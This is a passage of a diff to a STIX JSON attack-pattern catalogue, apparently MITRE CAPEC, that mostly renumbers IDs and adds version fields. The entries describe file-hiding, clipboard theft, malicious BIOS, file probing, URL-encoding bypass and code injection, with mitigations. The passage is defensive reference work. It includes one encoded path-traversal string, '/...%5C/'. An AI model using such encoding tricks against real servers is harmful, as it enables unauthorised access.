"relationship--4b4b6bd8-9567-4eb7-9f26-92bcd4c983dd", + "source_ref": "course-of-action--cc8cf389-f1d4-45b4-95a4-3b5659f8b063", "relationship_type": "mitigates", - "target_ref": "attack-pattern--25953ab2-8df4-4741-9268-2f7faf65f740" + "target_ref": "attack-pattern--11b6d192-7c0b-4f9a-a35d-478076c9ae58" }, { "name": "Hiding Malicious Data or Code within Files", "description": "Files on various operating systems can have a complex format which allows for the storage of other data, in addition to its contents. Often this is metadata about the file, such as a cached thumbnail for an image file. Unless utilities are invoked in a particular way, this data is not visible during the normal use of the file. It is possible for an attacker to store malicious data or code using these facilities, which would be difficult to discover.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -38609,43 +39289,44 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a402ceb9-571d-4be6-9d31-69e44dcbefad" + "id": "attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-636-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Many tools are available to search for the hidden data. Scan regularly for such data using one of these tools.", "type": "course-of-action", - "id": "course-of-action--cf72f157-8d91-4230-bf9d-abc1b5d4d822" + "id": "course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--20ea8173-c86e-4354-bf4c-6a34cb89beca", - "source_ref": "course-of-action--cf72f157-8d91-4230-bf9d-abc1b5d4d822", + "id": "relationship--851e123e-3787-49ae-a913-2f5b740e4449", + "source_ref": "course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1", "relationship_type": "mitigates", - "target_ref": "attack-pattern--a402ceb9-571d-4be6-9d31-69e44dcbefad" + "target_ref": "attack-pattern--ee680af9-b2da-44fc-a254-2c2925ffe18e" }, { "name": "Collect Data from Clipboard", "description": "The adversary exploits an application that allows for the copying of sensitive data or information by collecting information copied to the clipboard. Data copied to the clipboard can be accessed by other applications, such as malware built to exfiltrate or log clipboard contents on a periodic basis. In this way, the adversary aims to garner information to which he is unauthorized.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -38673,65 +39354,66 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--25ab3709-d615-43ac-a4c7-09f404c289e7" + "id": "attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-637-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "While copying and pasting of data with the clipboard is a legitimate and practical function, certain situations and context may require the disabling of this feature. Just as certain applications disable screenshot capability, applications that handle highly sensitive information should consider disabling copy and paste functionality.", "type": "course-of-action", - "id": "course-of-action--1017391d-ea74-405c-9a14-ac9824546b1b" + "id": "course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--49d6c2b0-eb85-4c34-8610-0d3adfbf3f73", - "source_ref": "course-of-action--1017391d-ea74-405c-9a14-ac9824546b1b", + "id": "relationship--c997e17d-b481-44ab-8641-d268fc9964bb", + "source_ref": "course-of-action--dea16962-39f8-45fc-a56d-358a8713bdf9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--25ab3709-d615-43ac-a4c7-09f404c289e7" + "target_ref": "attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-637-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Employ a robust identification and audit/blocking via whitelisting of applications on your system. Malware may contain the functionality associated with this attack pattern.", "type": "course-of-action", - "id": "course-of-action--e0dbf853-3090-4314-8b94-5aeabaa9af32" + "id": "course-of-action--ebb71328-0223-4062-8a80-43070611f373" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", - "modified": "2018-07-31T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a9d1991f-bc81-49e7-9f7d-bc5c7d3e6ffe", - "source_ref": "course-of-action--e0dbf853-3090-4314-8b94-5aeabaa9af32", + "id": "relationship--460dbf85-6d21-426d-965f-e46fdf180719", + "source_ref": "course-of-action--ebb71328-0223-4062-8a80-43070611f373", "relationship_type": "mitigates", - "target_ref": "attack-pattern--25ab3709-d615-43ac-a4c7-09f404c289e7" + "target_ref": "attack-pattern--a0553da3-9941-4500-b267-cb7e16a5bc63" }, { "name": "Altered Component Firmware", "description": "An adversary with access to download and update system software sends a maliciously altered BIOS to the victim or victim supplier/integrator, which when installed allows for future exploitation.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -38757,15 +39439,16 @@ "An attacker compromises the download and update portion of a manufacturer's web presence, and develops a malicious BIOS that in addition to the normal functionality will also at a specific time of day disable the remote access subsystem's security checks. The malicious BIOS is put in place on the manufacturer's website, the victim location is sent an official-looking email informing the victim of the availability of a new BIOS with bug fixes and enhanced performance capabilities to entice the victim to install the new BIOS quickly. The malicious BIOS is downloaded and installed on the victim's system, which allows for additional compromise by the attacker." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--e8e04d9d-60cd-460e-83a8-38843bc79793" + "id": "attack-pattern--c2ed7aea-f0e3-433b-9d06-453dcd1a21be" }, { "name": "Probe System Files", "description": "An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-05-04T00:00:00.000Z", "modified": "2018-05-04T00:00:00.000Z", @@ -38796,40 +39479,41 @@ "Adversaries may search network shares on computers they have compromised to find files of interest." ], "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--1a0ee9fa-c448-4e36-86ec-caecc902f997" + "id": "attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-04T00:00:00.000Z", "modified": "2018-05-04T00:00:00.000Z", "name": "coa-639-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Verify that files have proper access controls set, and reduce the storage of sensitive information to only what is necessary.", "type": "course-of-action", - "id": "course-of-action--db756053-132a-4e58-963c-f63ed982aab5" + "id": "course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-05-04T00:00:00.000Z", "modified": "2018-05-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b6bba11e-9504-487e-b9b6-5925365413f6", - "source_ref": "course-of-action--db756053-132a-4e58-963c-f63ed982aab5", + "id": "relationship--c872df25-83b3-49d5-bfa5-f1d177eee584", + "source_ref": "course-of-action--ac9ac07b-b96d-42fa-9c32-eb7b6531cb0f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--1a0ee9fa-c448-4e36-86ec-caecc902f997" + "target_ref": "attack-pattern--1f3bd742-4a95-4a3d-acd6-f82b15720d9f" }, { "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -38971,106 +39655,107 @@ "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "id": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--c6a3d1be-7e41-42e1-ba71-54fc41a2a664", - "source_ref": "course-of-action--e30069ef-47f0-4bad-a1ca-881c17cd8c30", + "id": "relationship--d61b1986-cb61-404b-950f-99e02127487b", + "source_ref": "course-of-action--afd793c6-61b0-44aa-8eae-87cd14cafc6b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--cb5df71b-028d-4ca5-b58e-2fa62114dcf3", - "source_ref": "course-of-action--1f793721-42b4-4c42-bf8d-4cf88a830267", + "id": "relationship--0388e527-777a-43f8-b7b9-f66f589f0d17", + "source_ref": "course-of-action--a039914e-d5b9-46c7-98fa-57d0c714c8e5", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1406590a-2000-4971-99d9-919cebc49bfa", - "source_ref": "course-of-action--137932dd-0498-4500-9a8b-ff29e913a1f3", + "id": "relationship--81ef7c1f-e9cc-4c67-8622-6dccca0fbd6d", + "source_ref": "course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--97a2ee64-6326-459c-a4ca-91c8ab000433", - "source_ref": "course-of-action--7ca1b98c-a3d7-4859-a784-75ff258765c8", + "id": "relationship--cb112114-48b9-48c9-ac6d-3a22374a55cc", + "source_ref": "course-of-action--a7e6b281-8e4e-4a25-9724-167e00f6ffca", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4c425994-2d6f-455a-a6a2-c99a268ef780", - "source_ref": "course-of-action--8d8aa558-cac2-4d1b-b1e1-a11915a268b8", + "id": "relationship--7a04dce2-d860-4de7-972d-835d61baed06", + "source_ref": "course-of-action--8765b029-9621-452e-9a68-6ea740a42ece", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--1f7f9bcf-acdd-44ca-b614-8dd508a07e12", - "source_ref": "course-of-action--241842ea-2c29-4aa0-b497-a6a41f2fde99", + "id": "relationship--c0e2e578-a6d9-4ed6-a0b4-f8033d9e1cba", + "source_ref": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--68c920d8-8081-4149-a293-674b4e8d22f4", - "source_ref": "course-of-action--8d8baedc-2a15-425c-8760-dcb501c425c9", + "id": "relationship--0900c8f8-f195-448d-96d4-f618683f6f38", + "source_ref": "course-of-action--e56368a8-b58f-4640-a0b4-a8ca89ef10f7", "relationship_type": "mitigates", - "target_ref": "attack-pattern--36b3ecdf-e222-4ee0-9779-9d0ae6a34972" + "target_ref": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa" }, { "name": "Inclusion of Code in Existing Process", "description": "The adversary takes advantage of a bug in an application failing to verify the integrity of the running process to execute arbitrary code in the address space of a separate live process. The adversary could use running code in the context of another process to try to access process's memory, system/network resources, etc. The goal of this attack is to evade detection defenses and escalate privileges by masking the malicious code under an existing legitimate process. Examples of approaches include but not limited to: dynamic-link library (DLL) injection, portable executable injection, thread execution hijacking, ptrace system calls, VDSO hijacking, and more.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", @@ -39101,165 +39786,166 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "id": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-640-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Prevent unknown or malicious software from loading through whitelisting policy.", "type": "course-of-action", - "id": "course-of-action--2251fd6e-7908-444d-ae4d-61669dcec235" + "id": "course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--309b2157-c290-423e-b514-36d21679c13f", - "source_ref": "course-of-action--2251fd6e-7908-444d-ae4d-61669dcec235", + "id": "relationship--0a2f1057-c343-415a-8403-0e54ee1b2102", + "source_ref": "course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-640-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Properly restrict the location of the software being used.", "type": "course-of-action", - "id": "course-of-action--e8aa8560-dc40-4013-9a37-1bf668fa521c" + "id": "course-of-action--4f26db10-8931-420a-9894-08ba87d842af" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--8ee359cc-6ad9-439d-a64e-75a597a4c299", - "source_ref": "course-of-action--e8aa8560-dc40-4013-9a37-1bf668fa521c", + "id": "relationship--5944cffe-d0fc-4ca9-8b0b-b3e877e439fe", + "source_ref": "course-of-action--4f26db10-8931-420a-9894-08ba87d842af", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-640-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Leverage security kernel modules providing advanced access control and process restrictions like SELinux.", "type": "course-of-action", - "id": "course-of-action--e30adcc7-d5a3-47f8-b6d4-d8f64b913f90" + "id": "course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e7c3737b-bfc9-4c1f-8372-cff36f2fea3c", - "source_ref": "course-of-action--e30adcc7-d5a3-47f8-b6d4-d8f64b913f90", + "id": "relationship--abe12e18-a9a3-45fa-be8f-aa5caad45774", + "source_ref": "course-of-action--e2ee1f2a-0265-4601-9703-d4a308c1f7ea", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-640-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor API calls like CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and similar for Windows.", "type": "course-of-action", - "id": "course-of-action--78f4dc22-9a1c-4ec2-be8a-c465975c1c2f" + "id": "course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--da57d28e-1e90-457f-ad38-68a6c7a631a2", - "source_ref": "course-of-action--78f4dc22-9a1c-4ec2-be8a-c465975c1c2f", + "id": "relationship--10c9a57f-7f43-43d7-b57d-d725239e32ea", + "source_ref": "course-of-action--fb9e78db-adf4-4fc7-b672-f086a0466eff", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-640-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor API calls like ptrace system call, use of LD_PRELOAD environment variable, dlfcn dynamic linking API calls, and similar for Linux.", "type": "course-of-action", - "id": "course-of-action--8da41f61-4138-45a2-a1c4-17f65f2036e1" + "id": "course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4e037dcb-4f70-437f-bccb-7b210a6d5b42", - "source_ref": "course-of-action--8da41f61-4138-45a2-a1c4-17f65f2036e1", + "id": "relationship--53468df7-a022-4040-aa2c-33c43de2c9df", + "source_ref": "course-of-action--e9490c07-8a26-412c-88a2-b20d64197ae3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--55946915-0a5f-4acb-b3af-c997a8ff501e" + "target_ref": "attack-pattern--83c111d0-0f3e-422c-ac73-819d29403c64" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-640-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor processes and command-line arguments for unknown behavior related to code injection.", "type": "course-of-action", - "id": "course-of-action--e7ce65e2-df37-4dc7-bfd1-4a5300ef3960" + "id": "course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2018-07-31T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4135170a-e8f4-4983-8cfc-1e7ad1c62e09", - "source_ref": "course-of-action--e7ce65e2-df37-4dc7-bfd1-4a5300ef3960", + "id": "relationship--f4f5521b-dcf2-48f8-8087-5626b06446ca", + "source_ref": 